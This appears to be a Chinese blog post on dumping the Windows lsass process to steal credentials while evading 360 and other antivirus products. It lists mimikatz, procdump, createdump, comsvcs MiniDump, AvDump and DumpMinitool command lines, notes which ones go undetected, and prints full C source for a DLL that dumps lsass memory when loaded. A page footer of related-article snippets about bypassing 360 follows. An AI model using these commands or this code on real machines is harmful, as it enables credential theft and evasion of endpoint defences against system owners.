绕过360实现lsass转储
前言
获取Windows用户的凭证信息是渗透过程中至关重要的一步。
没杀软,只要有权限想怎么读就怎么读。
有杀软,得用一些特别的技巧。
注:本机所有测试均为物理机,且为最新版AV
Mimikatz直接读取Lsass进程
权限提升
privilege::debug
抓取密码
sekurlsa::logonpasswords
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BSPqd5Xv-1650257094211)(image-20220411145456534.png)]
但如果此时目标机器上有AV,必定将收到拦截
此时mimikatz必须免杀。
一般来说,目标机器有杀软的存在,更倾向于离线解析密码。
白名单文件dump
首先说三个微软签名的白名单程序
- Procdump.exe
- SQLDumper.exe
- createdump.exe
Procdump.exe(no)
尽管procdump拥有微软签名,但大部分AV厂商对此并不买账。
procdump.exe -ma lsass.exe 1.txt
SQLDumper.exe也是一样的
createdump.exe(no)
createdump.exe随着.NET5出现的,本身是个native binary
虽然有签名同样遭到AV查杀
createdump.exe -u -f lsass.dmp lsass[PID]
Rundll32.exe(no)
使用rundll32直接执行comsvcs.dll的导出函数
MiniDump
来Dump进程内存
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id Desktop\lsass-comsvcs.dmp full
同样被查杀
avdump.exe(yes)
AvDump.exe
是Avast
杀毒软件中自带的一个程序,可用于转储指定进程(lsass.exe)内存数据,它带有Avast杀软数字签名。
默认路径为:
C:\Program Files\Avast Software\Avast
AvDump.exe --pid 980 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp
成功dump并解密,全程数字杀软无感。
DumpMinitool.exe(yes)
此exe为近日mr.d0x
的某推上分享了的一个LOLBIN,通过vs2022里的DumpMinitool.exe
来导出lsass
进程。
路径为:
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
数字杀软全程无感
DumpMinitool.exe --file 1.txt --processId 980 --dumpType Full
其他方式
SilentProcessExit进行Dump(no)
具体原理参考文章:利用SilentProcessExit机制dump内存
Silent Process Exit,即静默退出。而这种调试技术,可以派生 werfault.exe进程,可以用来运行任意程序或者也可以用来转存任意进程的内存文件或弹出窗口。
但该方式需要修改注册表,修改注册表操作将会被查杀。
编写Dump Lsass的DLL(yes)
- 获取Debug权限
- 找到lsass的PID
- 使用MiniDump或MiniDumpWriteDump进行内存dump
#include <stdio.h>
#include <Windows.h>
#include <tlhelp32.h>typedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);int GetLsassPid() {PROCESSENTRY32 entry;entry.dwSize = sizeof(PROCESSENTRY32);HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);if (Process32First(hSnapshot, &entry)) {while (Process32Next(hSnapshot, &entry)) {if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {return entry.th32ProcessID;}}}CloseHandle(hSnapshot);return 0;
}void GetDebugPrivilege()
{BOOL fOk = FALSE;HANDLE hToken;if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)){TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes = true ? SE_PRIVILEGE_ENABLED : 0;AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);fOk = (GetLastError() == ERROR_SUCCESS);CloseHandle(hToken);}
}void DumpLsass()
{wchar_t ws[100];_MiniDumpW MiniDumpW;MiniDumpW = (_MiniDumpW)GetProcAddress(LoadLibrary(L"comsvcs.dll"), "MiniDumpW");swprintf(ws, 100, L"%u %hs", GetLsassPid(), "c:\\windows\\temp\\temp.bin full");GetDebugPrivilege();MiniDumpW(0, 0, ws);
}BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:DumpLsass();break;case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;
}
成功dump,数字杀软无感。
绕过360实现lsass转储相关推荐
- 绕过360安全卫士的部分代码
利用快捷方式,由用户启动程序,进行绕过360父进程查杀,代码记录于此处,方便查阅 int bypass_360_startup() {TCHAR str_desktop[256];LPITEMIDLI ...
- xss绕过php,php云人才系统多处Xss漏洞(绕过360防护)
### 简要描述: php云人才系统多处Xss漏洞(绕过360),可影响后台及其他用户. 360防护挂掉了,这该怎么办.. ### 详细说明: 虽然php云人才系统里加入360防注入脚本,对于一般的x ...
- 利用Win32 API绕过360驱动防火墙
一开始,RK和ARK之间的"军备竞赛"比拼的是哪一方对Windows内核了解的更加深入--越底层就越能抢占到制高点.然而后来,ARK很不厚道的用"驱动防火墙"将 ...
- 系统安全-BadUsb代码以及木马远控的制作(可绕过360)
漏洞背景 是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布.BadUsb号称是世界上最邪恶的USB外设.笔者 ...
- badusb示例代码可绕过360
绕过360版本代码: void setup() {// putpower shell your setup code here, to run onceKeyboard.begin();//开始键盘通 ...
- 一次绕过360+诺顿的提权过程
索引 0x01 获取webshell 0x02 绕过杀软提权思路 0x03 mof 提权原理 0x04利用mysql写入mof提权 0x05 总结 0x01 获取webshell 在一次渗透中,获取了 ...
- 2017php免杀大马,cs 免杀 payload 绕过 360 全家桶
文章来源于叮咚实验室 作者:吃个橘子 实验环境: Win10 物理机(cs 服务端)Win7 虚拟机(360 安全卫士+360 杀毒全家桶 最新版) 准备材料:vs2017 ,cs 我们先用CS生成普 ...
- (记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)
1.首先cs生成一个64位的Python Payload 2.截取其中的Payload,并进行base64编码. 3.把这一串子base64放到VPS上.并开启web服务. python3 -m ht ...
- 360safe.php绕过,venom结合Metasploit绕过360安全卫士
原理:msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了 一些 Veil-Evasion.py, unicorn. ...
- 360阻止了java运行,Java破绽利用-jre安装路径绕过360拦截
测试DEMO来自:http://shinewooyun.duapp.com/ 编译成class后: import java.applet.Applet; import java.beans.Expre ...
最新文章
- linux 查找目录或文件详解
- 简单的问题和复杂的问题
- python3 如何读中文路径_Python 3.8.2安装教程
- 计算机组成原理实验七,计算机组成原理实验七.doc
- java 计算协方差_Java的深度:通过协方差暴露的API泄漏
- CentOs中iptables配置允许mysql远程访问
- 私有变量访问/延后执行代码块
- 判断当前用户有无Administrator的权限
- 如何枚举JavaScript对象的属性? [重复]
- NTFS-3G的安装和配置(Linux下挂载Windows分区必备)
- 代码设计之多渠道支付
- matlab圆孔孔壁应力集中,具有功能梯度加强环的有限尺寸开孔板应力集中问题
- 3手机版怎么换行_敬业签手机版便签软件怎么绑定QQ或微信互联登录?
- (一)淘宝首页的代码(周六一天敲出来的)html结构展示
- phpcms2008网站漏洞如何修复 远程代码写入缓存漏洞利用
- VUE学习笔记------奕长苏
- java path 注解_Java内置系统注解和元注解
- 两年,从纯小白到腾讯阿里,应届非计算机毕业生的2014互联网求职之路
- 【代码审计】那些代码审计的思路.md
- 从响应式编程到 Combine 实践
热门文章
- [Python从零到壹] 四十三.图像增强及运算篇之图像点运算和图像灰度化处理
- php集成环境安装包网盘,一键安装PHP环境(Z Serv)PHP集成环境安装包
- php 判断微信浏览器支付宝,PHP判断是手机端-PC端-微信浏览器
- Linux驱动之Kconfig语法——学习笔记(11)
- iOS 点击图片放大效果
- 从0到1实现Web端H.265播放器:视频解码篇
- JDBC(尚硅谷宋红康老师笔记)
- python 有道翻译,python 实现有道翻译功能
- 物联网平台建设调研报告
- AutoCAD2018_输出与打印